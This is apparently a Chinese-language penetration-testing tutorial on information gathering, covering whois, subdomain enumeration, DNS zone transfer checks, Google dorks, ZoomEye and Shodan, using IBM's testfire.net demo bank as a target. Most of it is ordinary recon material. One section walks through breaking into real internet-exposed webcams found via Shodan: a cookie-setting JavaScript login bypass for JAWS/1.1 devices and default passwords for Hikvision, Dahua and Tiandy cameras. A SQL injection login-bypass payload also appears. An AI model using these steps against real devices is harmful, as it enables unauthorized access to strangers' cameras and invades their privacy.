神出鬼没的Enderman

信息收集

在划定了测试范围之后,就需要进入信息收集阶段.在这个阶段,渗透人员需要使用各种公开资源尽可能地获取测试目标的相关信息

• 论坛
• 公告板
• 新闻组
• 媒体文章
• 博客
• 社交网络
• 其他商业或非商业性的网站
• github

此外,他们也可以借助各种搜索引擎中获取相关数据,如谷歌,雅虎,MSN必应,百度等.收集的信息主要包括DNS 服务器,路由关系,whois 数据库,电子邮件地址,电话号码,个人信息以及用户账户.收集的信息越多,渗透测试成功的概率越高.testfire.net是IBM公司为了演示旗下比较有名的Web 漏洞扫描器AppScan 的强大功能所搭建的模拟银行网站,所以上面会有很多常见的Web安全漏洞

• 攻击目标:testfire.net
• 攻击目标:http://vulnweb.com

DNS信息

在收集DNS 信息的时候,主要关注域名注册商,管理员联系方式,电话和邮箱,子域名等信息.

whois查询

whois是一个集成在kali中的小工具,可以用来查询域名注册信息

whois 1997sty.com

站长之家whois查询

• http://whois.chinaz.com
• whois查询
• 邮箱反查
• 注册人反查
• 电话反查

子域名查询

• https://searchdns.netcraft.com

可以查询子域名的网站,如果打不开需要使用VPN.在表单中直接提交域名即可,这种方法查询大型网站比较有优势.

域传送漏洞

• 漏洞搭建参考该网站https://vulhub.org
• vulhub-master.zip
• DNS域传送漏洞

#可以使用kali中dig工具来检测域传送漏洞
#发送axfr类型的dns请求 如果存在漏洞就会获取到所有子域名的解析记录
dig @10.0.0.254 -t axfr vulhub.org

dnsrecon子域名爆破

准备一个字典里面写上所有可能的域名.字典中的每个单词,依次去尝试

dnsrecon -d baidu.com -D /root/dns.dic -t brt

DNS2IP

#ping
ping www.baidu.com
#nslookup
nslookup www.baidu.com
#dnsenum
#推荐使用dnsenum,此款工具在解析域名的时候,会自动检测域传送漏洞
dnsenum www.baidu.com

CDN加速的问题

CDN是内容分发网络本意是进行节点缓存,使网站访问速度加快.一般情况下是没办法得到目标网站的真实IP 的.CDN加速获取真实ip可以参考以下资料

• https://www.t00ls.net/articles-36160.html
• http://www.91ri.org/6233.html
• http://www.91ri.org/3563.html

IP查询

站长之家ip查询

• http://ip.chinaz.com/65.61.137.117

站长之家同IP网站查询

• http://stool.chinaz.com/same?s=65.61.137.117

查询IP地址经纬度

• https://www.maxmind.com/en/home

利用搜索引擎搜集信息

google

google机器人,爬行全世界所有网站的内容.google hacker就是利用搜索引擎语法,获取有关网站的信息.

• www.google.com
• site : 指定网站
• "" : 包含关键字
• inurl : 在url中出现的关键字
• filetype : 指定文件类型

#探索网站目录结构
site:testfire.net "parent directory"
#搜索容易存在sql注入的页面
site:testfire.net inurl:login
#搜索指定的文件类型
filetype pdf
#搜索phpinfo()
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
#搜索PHPstudy
intitle:"php中文网 探针2014"

钟馗之眼

ZoomEye 支持公网设备指纹检索和 Web 指纹检索.网站指纹包括应用名,版本,前端框架,后端框架,服务端语言,服务器操作系统,网站容器,内容管理系统和数据

• https://www.zoomeye.org

shodan

Shodan是一个搜索引擎,它使用户可以使用各种过滤器查找连接到Internet的特定类型的计算机(网络摄像头,路由器,服务器等).有人还将其描述为服务标语的搜索引擎,服务标语是服务器发送回客户端的元数据.这可以是有关服务器软件,服务支持哪些选项,欢迎消息或客户端在与服务器进行交互之前可以找到的其他信息的信息.

• https://www.shodan.io

使用shodan破解摄像头实战

• 利用shodan搜索JAWS/1.1

• 入侵网络摄像头方式

1. 空口令登入,点击第一条连接,即可进入登录页面
2. 登录绕过,在控制台中输入以下JS 代码,然后直接访问/view2.html,即可绕过登录验证进入控制台

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

其他摄像头默认账密

• Hikvision海康威视IP网络摄像机admin,密码:12345
• Server:DVRDVS-Webs大华网络摄像机 admin,密码:888888
• 天地伟业网络摄像机Admin,密码:111111

SQL注入攻击

• http://testfire.net/login.jsp

#用户名和密码均使用以下参数登录
1' or '1'='1

其他参考资料

• 域传送漏洞
• 收集子域名的思路
• Web信息收集
• shodan语法
• 关于摄像头
• GHDB